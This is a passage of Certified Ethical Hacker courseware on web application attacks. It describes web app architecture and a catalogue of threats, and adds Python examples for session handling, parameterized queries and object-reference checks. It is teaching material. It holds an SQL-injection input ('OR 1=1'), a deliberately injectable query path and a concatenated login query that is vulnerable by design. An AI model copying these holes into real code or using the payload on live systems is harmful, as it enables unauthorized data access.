Hacking Web Applications
Module 13
Exam 312-50 Certified Ethical Hacker
Ethical Hacking and Countermeasures
Engineered by Hackers. Presented by Professionals.
CEH
Ethical Hacking and Countermeasures v8
Module 13: Hacking Web Applications
Exam 312-50
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Module 13 Page 1724
Security News

XSS Attacks Lead Pack As Most Frequent Attack Type
Source: http://www.darkreading.com
Secure cloud hosting company, FireHost, has today announced the findings of its latest web application attack report, which provides statistical analysis of the 15 million cyber-attacks blocked by its servers in the US and Europe during Q3 2012. The report looks at attacks on the web applications, databases and websites of FireHost's customers between July and September, and offers an impression of the current internet security climate as a whole.

Amongst the cyber-attacks registered in the report, FireHost categorises four attack types in particular as representing the most serious threat. These attack types are among FireHost's 'Superfecta' and they consist of Cross-site Scripting (XSS), Directory Traversals, SQL Injections, and Cross-site Request Forgery (CSRF).

One of the most significant changes in attack traffic seen by FireHost between Q2 and Q3 2012 was a considerable rise in the number of cross-site attacks, in particular XSS and CSRF attacks rose to represent 64% of the group in the third quarter (a 28% increased penetration). XSS is now the most common attack type in the Superfecta, with CSRF now in second. FireHost's servers blocked more than one million XSS attacks during this period alone, a figure which rose 69%, from 603,016 separate attacks in Q2 to 1,018,817 in Q3. CSRF attacks reached second place on the Superfecta at 843,517.
Cross-site attacks are dependent upon the trust developed between site and user. XSS attacks involve a web application gathering malicious data from a user via a trusted site (often coming in the form of a hyperlink containing malicious content), whereas CSRF attacks exploit the trust that a site has for a particular user instead. These malicious security exploits can also be used to steal sensitive information such as user names, passwords and credit card details - without the site or user's knowledge.

The severity of these attacks is dependent on the sensitivity of the data handled by the vulnerable site and this ranges from personal data found on social networking sites, to the financial and confidential details entered on ecommerce sites amongst others. A great number of organisations have fallen victim to such attacks in recent years including attacks on PayPal, Hotmail and eBay, the latter falling victim to a single CSRF attack in 2008 which targeted 18 million users of its Korean website. Furthermore in September this year, IT giants Microsoft and Google Chrome both ran extensive patches targeted at securing XSS flaws, highlighting the prevalence of this growing online threat.

"Cross-site attacks are a severe threat to business operations, especially if servers aren't properly prepared," said Chris Hinkley, CISSP - a Senior Security Engineer at FireHost. "It's vital that any site dealing with confidential or private user data takes the necessary precautions to ensure applications remain protected. Locating and fixing any website vulnerabilities and flaws is a key step in ensuring your business and your customers don't fall victim to an attack of this nature. The consequences of which can be significant, in terms of both financial and reputational damage."

The Superfecta attack traffic for Q3 2012 can be broken down as follows:

As with Q2 2012, the majority of attacks FireHost blocked during the third calendar quarter of 2012 originated in the United States (11 million / 74%). There has however, been a great shift in the number of attacks originating from Europe this quarter, as 17% of all malicious attack traffic seen by FireHost came from this region. Europe overtook Southern Asia (which was responsible for 6%), to become the second most likely origin of malicious traffic.

Varied trends among the Superfecta attack techniques are demonstrated between this quarter and last:

During the build up to the holiday season, ecommerce activity ramps up dramatically and cyber-attacks that target website users' confidential data are also likely to increase as a result. As well as cross-site attacks, the other Superfecta attack types, SQL Injection and Directory Traversal, still remain a significant threat despite a slight reduction in frequency this quarter.

Ecommerce businesses need to be aware of the risks that this period may present to their security, as Todd Gleason, Director of Technology at FireHost explains, "You'd better believe that hackers will try and take advantage of any surges in holiday shopping. They will be devising a number of ways they can take advantage of any web application vulnerabilities and will use an assortment of different attack types and techniques to do so. When it's a matter of confidential data at risk, including customer's financial information - credit card and debit card details - there's no room for complacency. These organisations need to know that there's an increased likelihood of attack during this time and it's their responsibility to take the necessary steps to stop such attacks."
Copyright © 2013 UBM Tech, All rights reserved
http://www.darkreading.com/security/news/240009508/firehost-q3-web-application-report-xss-attacks-lead-pack-as-most-frequent-attack-type.html
Module Objectives

The main objective of this module is to show the various kinds of vulnerabilities that can be discovered in web applications. The attacks exploiting these vulnerabilities are also highlighted. The module starts with a detailed description of web applications. Various web application threats are mentioned. The hacking methodology reveals the various steps involved in a planned attack. The various tools that attackers use are discussed to explain the way they exploit vulnerabilities in web applications. The countermeasures that can be taken to thwart any such attacks are also highlighted. Security tools that help network administrators monitor and manage web applications are described. Finally, web application pen testing is discussed.

This module familiarizes you with:

- How Web Applications Work
- Web Attack Vectors
- Web Application Threats
- Web App Hacking Methodology
- Footprint Web Infrastructure
- Hacking Web Servers
- Analyze Web Applications
- Attack Authentication Mechanism
- Attack Authorization Schemes
- Session Management Attack
- Attack Data Connectivity
- Attack Web App Client
- Attack Web Services
- Web Application Hacking Tools
- Countermeasures
- Web Application Security Tools
- Web Application Firewall
- Web Application Pen Testing
Module Flow
Web applications are application programs that are accessed over a network, typically through a web browser, and they use HTTP as their primary communication protocol. Attackers target these applications for several reasons, chief among them that they are reachable by anyone who can reach them over the network and are therefore exposed to a wide range of attacks. For a clear understanding of hacking web applications, the concept is divided into the following sections:

- Web App Concepts
- Web App Threats
- Hacking Methodology
- Web Application Hacking Tools
- Countermeasures
- Security Tools
- Web App Pen Testing

Let us begin with the web app concepts.
This section introduces you to the web application and its components, explains how the web application works, and describes its architecture. It provides insight into Web 2.0 applications, vulnerability stacks, and web attack vectors.
Web Application Security Statistics
Source: https://www.whitehatsec.com

According to the WhiteHat Security Website Statistics Report for 2012, cross-site scripting vulnerabilities are found in more web applications than any other vulnerability class. From the graph you can observe that in the year 2012, cross-site scripting was the most common vulnerability class, found in 55% of the web applications assessed, while insufficient session expiration was found in only 10% of them. To minimize the risk associated with cross-site scripting vulnerabilities in web applications, you have to adopt the necessary countermeasures against them.
FIGURE 13.1: WhiteHat Security Website Statistics Report, 2012 (bar chart of the percentage of websites affected by each vulnerability class, with a 2010 comparison; classes shown: Cross-Site Scripting, Information Leakage, Content Spoofing, Insufficient Authorization, Cross-Site Request Forgery, Brute Force, Predictable Resource Location, SQL Injection, Session Fixation, Insufficient Session Expiration; values legible in the extraction: 16%, 10%)
Introduction to Web Applications

- Web applications provide an interface between end users and web servers through a set of web pages that are generated at the server end or contain script code to be executed dynamically within the client web browser
- Web applications and Web 2.0 technologies are invariably used to support critical business functions such as CRM, SCM, etc. and improve business efficiency
- Though web applications enforce certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, session hijacking, etc.
- New web technologies such as Web 2.0 provide more attack surface for web application exploitation
Introduction to Web Applications

Web applications are applications that run on a remote web server and send their output to the client over the Internet. Web 2.0 technologies are used by many of these server-based applications for functions such as communication with users, clients, third-party users, etc.

A web application is comprised of many layers of functionality. However, it is generally considered a three-layered architecture consisting of presentation, logic, and data layers.

The web architecture relies substantially on the technology popularized by the World Wide Web, Hypertext Markup Language (HTML), and the primary transport medium, Hypertext Transfer Protocol (HTTP). HTTP is the medium of communication between the server and the client. Typically it operates over TCP port 80 (or port 443 when carried inside TLS as HTTPS), but a server can be configured to listen on any other port, so the port in use should be verified rather than assumed.

Web applications provide an interface between end users and web servers through a set of web pages that are generated at the server end or contain script code to be executed dynamically within the client web browser.

Some of the popular web servers present today are Microsoft IIS, Apache Software Foundation's Apache HTTP Server, AOL/Netscape's Enterprise Server, and Sun ONE. Resources are named by Uniform Resource Identifiers (URIs), and they may either be static pages or contain dynamic content. Since HTTP is stateless, i.e., the protocol does not maintain a session state, the requests for resources are treated as separate and unique. Thus, the integrity of a link is not maintained with the client.

Cookies can be used as tokens, which servers hand over to clients to allow access to websites, so that users do not have to re-authenticate for each request. However, cookies are not perfect from a security point of view: they are stored on the client (in memory or on the local disk), so they can be copied, and whoever presents a valid cookie is treated as the user it was issued to. Though web applications enforce certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, session hijacking, etc. Organizations rely on web applications and Web 2.0 technologies to support key business processes and improve performance. New web technologies such as Web 2.0 provide more attack surface for web application exploitation.

Attackers look for the different types of vulnerabilities that can be discovered in web applications and exploit them to compromise those applications. Attackers also use tools to launch attacks on web applications.
Web Application Components
The components of web applications are listed as follows:

Login: Most websites allow authenticated users to access the application by means of a login. To access the service or content offered by the web application, the user needs to submit his or her username and password. Example: gmail.com.

The Web Server: This refers to either software or hardware intended to deliver web content that can be accessed through the Internet. An example is the web pages served to the web browser by the web server.

Session Tracking Mechanism: Each web application has a session tracking mechanism. Because HTTP is stateless, the application needs some way to tie consecutive requests to the same user; the session can be tracked by using cookies, URL rewriting, or Secure Sockets Layer (SSL) session information.

User Permissions: When you are logged in but are not permitted to access a specific web page, the application may redirect you back to the login page or to some other page.

The Application Content: This is the interactive program that accepts web requests from clients and uses the parameters sent by the web browser to carry out certain functions.

Data Access: Usually the application code reaches the database through a data access library in which all the database connection details are stored.

The Data Store: This holds the important data that is shared and synchronized between the application's threads. The stored information is quite important and necessary for the higher levels of the application framework. It is not mandatory that the data store and the web server are on the same network; they can reach each other over the network connection.

Role-level System Security

Application Logic: Usually web applications are divided into tiers, of which the application logic is the middle tier. It receives the request from the web browser and services it accordingly. The services offered by the application logic include querying the database and writing updates to it, as well as generating the user interface.

Logout: An individual can log out of the web application or close the browser so that the session and the application state associated with it end. Closing the browser only discards a session cookie on the client; the server-side session ends either when the application logic explicitly invalidates it or automatically when the servlet session times out.
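The cookie-as-token discussion in the introduction and the Session Tracking Mechanism, User Permissions and Logout components above all rest on the same machinery. As an added example (not code from the EC-Council module), the following Python shows one way to implement it: a server-side session table keyed by a random token, the Set-Cookie header that carries the token with the HttpOnly, Secure and SameSite attributes, URL rewriting as the fallback for clients that reject cookies, an idle timeout, and logout as server-side invalidation. The cookie name SESSIONID and the 900-second timeout are assumptions chosen for the example.

```python
import secrets
import time
from http.cookies import SimpleCookie
from urllib.parse import parse_qs, urlencode, urlparse

# Assumed idle timeout; real deployments tune this per application (constructed value)
SESSION_TTL_SECONDS = 900
COOKIE_NAME = "SESSIONID"  # hypothetical cookie name, chosen for this example


class SessionStore:
    """Server-side session table mapping an opaque token to the logged-in user.

    Only the random token is ever handed to the client; the user identity and
    the last-activity timestamp stay on the server, so a client cannot forge
    a session by editing what it holds.
    """

    def __init__(self, ttl=SESSION_TTL_SECONDS, clock=time.time):
        self.ttl = ttl
        self.clock = clock  # injectable so the timeout can be exercised deterministically
        self._sessions = {}

    def create(self, username):
        """Login: mint a 256-bit token from the OS CSPRNG (never a counter or a hash of the username)."""
        token = secrets.token_urlsafe(32)
        self._sessions[token] = {"user": username, "last_seen": self.clock()}
        return token

    def lookup(self, token):
        """Return the user bound to token, or None if unknown, logged out, or idle past the TTL."""
        entry = self._sessions.get(token)
        if entry is None:
            return None
        if self.clock() - entry["last_seen"] > self.ttl:
            # Session timeout: forget the token server-side rather than trusting the client to drop it
            del self._sessions[token]
            return None
        entry["last_seen"] = self.clock()
        return entry["user"]

    def destroy(self, token):
        """Logout: invalidate server-side state; clearing the browser cookie alone leaves a stolen copy valid."""
        self._sessions.pop(token, None)


def session_cookie_header(token):
    """Build the Set-Cookie value that carries the token to the browser.

    HttpOnly keeps the token out of reach of injected JavaScript, Secure restricts it
    to HTTPS, and SameSite=Strict stops the browser attaching it to cross-site requests.
    """
    cookie = SimpleCookie()
    cookie[COOKIE_NAME] = token
    cookie[COOKIE_NAME]["httponly"] = True
    cookie[COOKIE_NAME]["secure"] = True
    cookie[COOKIE_NAME]["samesite"] = "Strict"
    cookie[COOKIE_NAME]["path"] = "/"
    return cookie.output(header="").strip()


def token_from_request(cookie_header, url):
    """Recover the session token from the Cookie header, falling back to URL rewriting."""
    if cookie_header:
        cookie = SimpleCookie()
        cookie.load(cookie_header)
        if COOKIE_NAME in cookie:
            return cookie[COOKIE_NAME].value
    query = parse_qs(urlparse(url).query)
    return query.get(COOKIE_NAME, [None])[0]


def rewrite_url(url, token):
    """URL rewriting for clients that reject cookies: the token rides in the query string.

    That puts it in browser history, proxy logs and Referer headers, which is why
    cookies are the preferred carrier and rewritten URLs should be short-lived.
    """
    parsed = urlparse(url)
    query = parse_qs(parsed.query)
    query[COOKIE_NAME] = [token]
    return parsed._replace(query=urlencode(query, doseq=True)).geturl()


if __name__ == "__main__":
    store = SessionStore()
    token = store.create("alice")
    print(session_cookie_header(token))
    print(rewrite_url("/account?page=2", token))
    print(store.lookup(token))
    store.destroy(token)
    print(store.lookup(token))
```

The clock parameter exists so the timeout can be exercised without waiting; in production leave it at time.time. Note that destroy() is what makes logout meaningful: instructing the browser to delete the cookie does nothing for a copy an attacker already holds.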
How Web Applications Work

SELECT * from news where id = 6329

Output
ID    Topic   News
6329  Tech    CNN
How Web Applications Work

Whenever someone clicks a link or types an address in the browser, the requested website or content appears on the screen almost immediately, but what is the mechanism behind this? The following is the step-by-step process that takes place once a user sends a request for particular content or a website, a process in which multiple computers are involved.

The web application model is explained in three layers. The first layer deals with user input through a web browser or user interface. The second layer contains the dynamic content generation technology, such as JSP (JavaServer Pages, built on Java servlets) or ASP (Active Server Pages), and the last layer contains the database for storing customer data such as user names and passwords, credit card details, etc. or other related information.

Let's see how the user triggers the initial request through the browser to the web application server:

1. First, the user types the website name or URL in the browser and the request is sent to the web server.
2. On receiving the request, the web server checks the file extension:
   - If the user requests a simple web page with an HTM or HTML extension, the web server processes the request and sends the file to the user's browser.
   - If the user requests a web page with the extension CFM, CFML, or CFC (or any other extension mapped to a dynamic handler), the request must be processed by the web application server. Therefore, the web server passes the user's request to the web application server.
3. The user's request is now processed by the web application server. In order to process the user's request, the web application server accesses the database placed at the third layer to perform the requested task by updating or retrieving the information stored in the database. Once done processing the request, the web application server sends the results to the web server, which in turn sends the results to the user's browser.

FIGURE 13.2: Working of Web Application (labels recovered from the diagram: User, Login Form, Internet, Firewall, Web Server)
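As an added example (not part of the EC-Council module), the three-layer flow above as a small Python program: the application layer reads the id parameter from the browser's URL, queries an in-memory SQLite database that stands in for the data layer, and hands the rows to a presentation function. The news table and its rows are constructed for the example (the first row mirrors the slide's output). The handler also has a parameterized=False mode that splices the raw parameter into the statement, the habit the module later covers under SQL injection, so the reader can see why the data layer must never receive untrusted text as part of the SQL.

```python
import sqlite3
from urllib.parse import parse_qs, urlparse

# Constructed sample rows standing in for the data layer; the first mirrors the slide's output
NEWS_ROWS = [
    (6329, "Tech", "CNN"),
    (6330, "Sports", "ESPN"),
    (6331, "Finance", "Bloomberg"),
]


def open_database():
    """Data layer: an in-memory SQLite database holding the news table from the slide."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, topic TEXT, news TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?, ?)", NEWS_ROWS)
    return conn


def handle_news_request(conn, url, parameterized=True):
    """Application layer: turn the browser's URL into a database query and return the rows.

    With parameterized=True the id is validated and bound as a parameter, so the
    database never interprets it as SQL. parameterized=False reproduces the
    string-building habit that leads to SQL injection.
    """
    query = parse_qs(urlparse(url).query)
    raw_id = query.get("id", [""])[0]

    if parameterized:
        # Validate before use: an article id is a whole number, nothing else is accepted
        if not raw_id.isdecimal():
            return []
        cur = conn.execute(
            "SELECT id, topic, news FROM news WHERE id = ? ORDER BY id", (int(raw_id),)
        )
    else:
        # The raw parameter is spliced into the statement text, so whatever the
        # browser sends becomes part of the SQL the data layer executes
        cur = conn.execute(
            f"SELECT id, topic, news FROM news WHERE id = {raw_id} ORDER BY id"
        )
    return cur.fetchall()


def render(rows):
    """Presentation layer: the plain-text table the browser would receive."""
    lines = ["ID    Topic    News"]
    for row_id, topic, news in rows:
        lines.append(f"{row_id:<5} {topic:<8} {news}")
    return "\n".join(lines)


if __name__ == "__main__":
    db = open_database()
    print(render(handle_news_request(db, "/news?id=6329")))
    # The same request with a tampered id: rejected when bound, every row when spliced
    print(render(handle_news_request(db, "/news?id=6329 OR 1=1")))
    print(render(handle_news_request(db, "/news?id=6329 OR 1=1", parameterized=False)))
```

Running it prints the single row for id=6329, an empty table for the tampered id when the parameter is validated and bound, and every row in the table when the same tampered id is spliced into the query text.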
Web Application Architecture
All web applications execute with the web browser acting as the client. Web applications use a group of server-side scripts (ASP, PHP, etc.) and client-side scripts (HTML, JavaScript, etc.) to execute the application. The information is presented by the client-side script, while tasks such as storing and gathering the required data are handled by the server-side script.

In the following architecture, the clients use different devices, web browsers, and external web services over the Internet to get the application executed using different scripting languages. Data access is handled by the database layer using cloud services and a database server.
FIGURE 13.3: Web Application Architecture (layers recovered from the diagram: Clients, such as web browsers, external web services, smart phones and web appliances, using client-side technologies like Flash, Silverlight and JavaScript; Presentation Layer, comprising proxy server and cache, web server, firewall, HTTP request parser, servlet container, resource handler, and authentication and login; Business Layer, comprising the application server with business logic in J2EE, .NET, COM, XCode, C++ or COM+, a legacy application, and data access; Database Layer, comprising cloud services and a database server)
Web 2.0 Applications

Web 2.0 refers to a new generation of web applications that provide an infrastructure for more dynamic user participation, social interaction, and collaboration. It offers various features such as:

- Advanced gaming
- Dynamic as opposed to static site content
- RSS-generated syndication
- Social networking sites (Flickr, Facebook, del.icio.us)
- Mash-ups (emails, IMs, electronic payment systems)
- Wikis and other collaborative applications
- Google Base and other free web services (Google Maps)
- Ease of data creation, modification, or deletion by individual users
- Online office software (Google Docs and Microsoft Light)
- Interactive encyclopedias and dictionaries
- Cloud computing websites such as Amazon.com
- Frameworks (Yahoo! UI Library, jQuery)
- Flash-rich interface websites
- Mobile applications (iPhone)
- New technologies like AJAX (Gmail, YouTube)
- Blogs (WordPress)
Vulnerability Stack
Web applications are maintained and accessed through various levels that include: custom web applications, third-party components, databases, web servers, operating systems, networks, and security devices. The mechanisms or services employed at each level help the user in one way or another to access the web application securely, and each of them is also a layer at which a flaw can be introduced. When talking about web applications, security is a critical component to be considered because web applications are a major target of attacks. The following vulnerability stack shows the levels and the corresponding element/mechanism/service employed at each level that can make the web application vulnerable:
FIGURE 13.4: Vulnerability Stack (Custom Web Applications: Business Logic Flaws; Third Party Components: Technical Vulnerabilities, Open Source / Commercial; Database: Oracle / MySQL / MS SQL; Web Server: Apache / Microsoft IIS; Operating System: Windows / Linux / OS X; Network: Router / Switch; Security: IPS / IDS)
Web Attack Vectors

- An attack vector is a path or means by which an attacker can gain access to computer or network resources in order to deliver an attack payload or cause a malicious outcome
- Attack vectors include parameter manipulation, XML poisoning, client validation, server misconfiguration, web service routing issues, and cross-site scripting
- Security controls need to be updated continuously as the attack vectors keep changing with respect to a target of attack
Web Attack Vectors

An attack vector is a method of entering unauthorized systems in order to perform malicious attacks. Once the attacker gains access to the system or the network, he or she delivers an attack payload or causes a malicious outcome. No protection method is completely attack-proof, as attack vectors keep changing and evolving with new technological changes.

Examples of various types of attack vectors:

- Parameter manipulation: The attacker provides wrong input values to the web services and gains control over the SQL, LDAP, XPATH, and shell commands. When incorrect values are provided to the web services, they become vulnerable, and the web applications running on those web services are easily attacked.
- XML poisoning: Attackers provide manipulated XML documents that, when processed, can disturb the logic of the parsing method on the server. When huge XML documents are processed at the application layer, they can easily be compromised by the attacker to launch his or her attack and gather information.
- Client validation: Most client-side validation has to be backed by server-side authentication. The AJAX routines can be easily manipulated, which in turn gives attackers a way to carry out SQL injection, LDAP injection, etc. and compromise the web application's key resources.
- Server misconfiguration: The attacker exploits the vulnerabilities in the web servers and tries to break the validation methods to get access to the confidential data stored on the servers.
- Web service routing issues: WS-Routers permit SOAP messages to travel through different nodes on the Internet. Compromised intermediate nodes can give access to the SOAP messages that are communicated between two endpoints.
- Cross-site scripting: Whenever any infected JavaScript code is executed, the targeted browsers can be exploited by the attacker to gather information.
Module Flow

Web applications are targeted by attackers for various reasons. The first issue is that the quality of the source code, as it relates to security, is poor; another issue is an application with a "complex setup." Due to these loopholes, attackers can easily launch attacks by exploiting them. Now we will discuss the threats associated with web applications.

Module flow: Web App Concepts, Web App Threats, Hacking Methodology, Web Application Hacking Tools, Countermeasures, Security Tools, Web App Pen Testing
This section lists and explains the various web application threats, such as parameter/form tampering, injection attacks, cross-site scripting attacks, DoS attacks, session fixation attacks, improper error handling, etc.
Web Application Threats - 1

(Slide diagram; labels recoverable from the slide: Cookie Poisoning, Broken Account Management, Information Leakage, Improper Error Handling, Insecure Storage)
Web Application Threats - 1

Web application threats are not limited to attacks based on URLs and port 80. Regardless of the ports, protocols, and OSI layers in use, the integrity of mission-critical applications must be protected from possible future attacks. Vendors who want to protect their products' applications must be able to deal with all methods of attack.

The various types of web application threats are as follows:

Cookie Poisoning

By changing the information inside the cookie, attackers bypass the authentication process, and once they gain control over the network, they can either modify the content, use the system for malicious attacks, or steal information from the user's system.

Directory Traversal

Attackers exploit HTTP by using directory traversal to access restricted directories; they execute commands outside of the web server's root directory.

Unvalidated Input

In order to bypass the security system, attackers tamper with HTTP requests, URLs, headers, form fields, hidden fields, query strings, etc. Users' login IDs and other related data get stored in cookies, and this becomes a source of attack for intruders. Attackers gain access to the victim's system using the information present in cookies. Examples of attacks caused by unvalidated input include SQL injection, cross-site scripting (XSS), buffer overflows, etc.
Cross-site Scripting (XSS)

An attacker bypasses the client's ID security mechanism and gains access privileges, and then injects malicious scripts into the web pages of a particular website. These malicious scripts can even rewrite the HTML content of the website.

Injection Flaws

Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed as part of a command or query.

SQL Injection

This is a type of attack where SQL commands are injected by the attacker via input data; the attacker can then tamper with the data.

Parameter/Form Tampering

This type of tampering attack is intended to manipulate the parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, price and quantity of products, etc. This information is actually stored in cookies, hidden form fields, or URL query strings, and is used to increase application functionality and control. Man in the middle is one example of this type of attack. Attackers use tools like WebScarab and Paros proxy for these attacks.

Denial-of-Service (DoS)

A denial-of-service attack is an attack method intended to terminate the operations of a website or a server and make it unavailable to intended users. For instance, a website belonging to a bank or an email service becomes unable to function for a few hours to a few days. This results in loss of time and money.

Broken Access Control

Broken access control is a method used by attackers where a particular flaw related to access control has been identified, authentication is bypassed, and the attacker compromises the network.

Cross-site Request Forgery

The cross-site request forgery method is a kind of attack where an authenticated user is made to perform certain tasks on the web application that an attacker chooses. For example, a user clicks on a particular link sent through an email or chat.
Information Leakage

Information leakage can cause great losses for a company. Hence, all sources such as systems or other network resources must be protected from information leakage by employing proper content filtering mechanisms.
Improper Error Handling

It is necessary to define how the system or network should behave when an error occurs. Otherwise, it may provide a chance for the attacker to break into the system. Improper error handling may lead to DoS attacks.

Log Tampering

Logs are maintained by web applications to track usage patterns such as user login credentials, admin login credentials, etc. Attackers usually inject, delete, or tamper with web application logs so that they can perform malicious actions or hide their identities.

Buffer Overflow

A web application's buffer overflow vulnerability occurs when it fails to guard its buffer properly and allows writing beyond its maximum size.

Broken Session Management

These types of attacks occur when security-sensitive credentials such as passwords and other useful material are not properly taken care of. Attackers compromise the credentials through these security vulnerabilities.

Security Misconfiguration

Developers and network administrators should check that the entire stack is configured properly, as security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, framework, and custom code. Missing patches, misconfigurations, use of default accounts, etc. can be detected with the help of automated scanners, which attackers exploit to compromise web application security.

Broken Account Management

Even authentication schemes that are valid are weakened by vulnerable account management functions, including account update, forgotten or lost password recovery or reset, password changes, and other similar functions.

Insecure Storage

Web applications need to store sensitive information such as passwords, credit card numbers, account records, or other authentication information somewhere, possibly in a database or on a file system. If proper security is not maintained for these storage locations, then the web application may be at risk, as attackers can access the storage and misuse the information stored. Insecure storage of keys, certificates, and passwords allows the attacker to gain access to the web application as a legitimate user.
Web Application Threats - 2

(Slide diagram; labels recoverable from the slide: Failure to Restrict URL Access, Security Management Exploits, Insufficient Transport Layer Protection, Obfuscation Application, DMZ Protocol Attacks, Unvalidated Redirects and Forwards, Malicious File Execution, Session Fixation Attack, Platform Exploits, Insecure Direct Object References, Insecure Cryptographic Storage, Authentication Hijacking, Web Services Attacks)
Web Application Threats - 2

Platform Exploits

Various web applications are built using different platforms such as BEA WebLogic and ColdFusion. Each platform has various vulnerabilities and exploits associated with it.

Insecure Direct Object References

An insecure direct object reference occurs when a developer exposes a reference to an internal implementation object such as a file, directory, database record, or key.

For example, where a bank account number is used as a primary key, there is a good chance it can be compromised by the attacker based on such references.
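As an added example of the countermeasure for the bank-account case just described (illustrative code written for this text, not EC-Council's or any product's code), the following Python replaces the direct reference with a per-session indirect reference map, and shows the simpler ownership check beside the unchecked lookup. The user/account ownership table is constructed for the example; the account numbers are the ones that appear in the transfer form later in this module.

```python
import secrets

# Constructed sample data for the example: which accounts each authenticated
# user owns. The account numbers are the ones used in the xferMoney.asp form
# later in this module; the ownership assignment is an assumption.
USER_ACCOUNTS = {
    "jason": ["123456789", "868686868"],
    "mallory": ["555555555"],
}


def direct_lookup_vulnerable(user, account):
    """Insecure direct object reference: the request names the record
    (here a bank account number used as the key) and the server trusts it."""
    return account  # no check that `account` belongs to `user`


def direct_lookup_hardened(user, account):
    """Same direct reference, but checked against the session owner's objects."""
    if account not in USER_ACCOUNTS.get(user, []):
        raise PermissionError("account does not belong to the authenticated user")
    return account


class IndirectReferenceMap:
    """Per-session map from random opaque tokens to real object identifiers.

    The page only ever carries the tokens (for example as <option value=...>),
    so a client cannot construct a reference to an account it was never offered,
    and the real key never leaves the server.
    """

    def __init__(self, user):
        self._token_to_id = {
            secrets.token_urlsafe(16): account
            for account in USER_ACCOUNTS.get(user, [])
        }

    def tokens(self):
        """Opaque tokens to embed in the rendered page instead of account numbers."""
        return list(self._token_to_id)

    def resolve(self, token):
        """Map a token from the request back to the real id; anything not issued
        to this session (including a raw account number) is rejected."""
        try:
            return self._token_to_id[token]
        except KeyError:
            raise PermissionError("reference was not issued to this session") from None
```

The ownership check is enough when the real key can safely be shown to the client; the indirect map is the stronger option when, as in the bank-account example, the key itself is sensitive.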
Insecure Cryptographic Storage

When sensitive data is stored in the database, it has to be properly encrypted using cryptography. Some cryptographic encryption methods developed by developers are not up to par; cryptographically strong encryption methods have to be used. At the same time, care must be taken in storing the cryptographic keys. If these keys are stored in insecure places, then the attacker can obtain them easily and decrypt the sensitive data.
Authentication Hijacking

In order to identify the user, every web application uses user identification such as a user ID and password. Once the attacker compromises the system, various malicious things like theft of services, session hijacking, and user impersonation can occur.

Network Access Attacks

Network access attacks can have a major impact on web applications. They can affect the basic level of services within an application and can allow access that standard HTTP application methods would not have.

Cookie Snooping

Attackers use cookie snooping on a victim's system to analyze their surfing habits and sell that information to other attackers, or they may use this information to launch various attacks on the victim's web applications.

Web Services Attacks

Web services are process-to-process communications that have special security issues and needs. An attacker injects a malicious script into a web service and is able to disclose and modify application data.

Insufficient Transport Layer Protection

SSL/TLS should be used for authentication on websites, or the attacker can monitor network traffic to steal an authenticated user's session cookie. Various threats such as account theft, phishing attacks, and admin account compromise may follow after systems have been compromised.

Hidden Manipulation

These types of attacks are mostly used by attackers to compromise e-commerce websites. Attackers manipulate the hidden fields and change the data stored in them. Several online stores face this type of problem every day. Attackers can alter prices and conclude transactions at the prices of their choice.

DMZ Protocol Attacks

The DMZ (Demilitarized Zone) is a semi-trusted network zone that separates the untrusted Internet from the company's trusted internal network. An attacker who is able to compromise a system that allows other DMZ protocols has access to other DMZs and internal systems. This level of access can lead to:

- Compromise of the web application and data
- Defacement of websites
- Access to internal systems, including databases, backups, and source code
Unvalidated Redirects and Forwards

Attackers make a victim click an unvalidated link that appears to be a valid site. Such redirects may attempt to install malware or trick victims into disclosing passwords or other sensitive information. Unsafe forwards may allow access control bypass, leading to:

- Session fixation attacks
- Security management exploits
- Failure to restrict URL access
- Malicious file execution

Failure to Restrict URL Access

An application often safeguards sensitive functionality by not displaying the links or URLs that lead to it. Attackers access those links or URLs directly and perform illegitimate operations.

Obfuscation Application

Attackers usually work hard at hiding their attacks to avoid detection. Network and host intrusion detection systems (IDSs) are constantly looking for signs of well-known attacks, driving attackers to seek different ways to remain undetected. The most common method of attack obfuscation involves encoding portions of the attack with Unicode, UTF-8, or URL encoding. Unicode is a method of representing letters, numbers, and special characters so that these characters can be displayed properly, regardless of the application or underlying platform in which they are used.

Security Management Exploits

Some attackers target security management systems, either on networks or on the application layer, in order to modify or disable security enforcement. An attacker who exploits security management can directly modify protection policies, delete existing policies, add new policies, and modify applications, system data, and resources.

Session Fixation Attack

In a session fixation attack, the attacker tricks or lures the user into accessing a legitimate web server using an explicit session ID value.

Malicious File Execution

Malicious file execution vulnerabilities have been found in most applications. The cause of this vulnerability is unchecked input into the web server. Due to this unchecked input, the attackers' files are easily executed and processed on the web server. In addition, the attacker performs remote code execution, installs a rootkit remotely, and, in at least some cases, takes complete control over the systems.
Unvalidated Input

- An attacker exploits input validation flaws to perform cross-site scripting, buffer overflow, injection attacks, etc. that result in data theft and system malfunctioning
- Input validation flaws refer to a web application vulnerability where input from a client is not validated before being processed by web applications and backend servers

(Slide diagram: Browser Post Request, Modified Query, web application, Database; browser input not validated by the web application. The request and query text are reproduced in Figure 13.5.)
Unvalidated Input

An input validation flaw refers to a web application vulnerability where input from a client is not validated before being processed by web applications and backend servers. Sites try to protect themselves from malicious attacks through input filtration, but there are various methods of encoding in use. Many HTTP inputs have multiple formats, which makes filtering very difficult. The canonicalization method is used to simplify the encodings and is useful in avoiding various attacks. Web applications that use only a client-side mechanism for input validation can easily be bypassed by attackers. In order to bypass the security system, attackers tamper with the HTTP requests, URLs, headers, form fields, hidden fields, and query strings. Users' login IDs and other related data get stored in cookies, and this becomes a source of attack for intruders. Attackers gain access to the systems by using the information present in the cookies. Various methods used by hackers are SQL injection, cross-site scripting (XSS), buffer overflows, format string attacks, cookie poisoning, and hidden field manipulation, which result in data theft and system malfunctioning.
Figure 13.5: Unvalidated Input. The browser posts a login request such as

    http://juggyboy.com/login.aspx?user=jason&pass=springfield

and the web application, without validating the browser input, builds the database query by string concatenation:

    string sql = "select * from Users where user='" + User.Text + "' and pwd='" + Password.Text + "'";

(Diagram labels: Browser Post Request, Modified Query, Database; browser input not validated by the web application.)
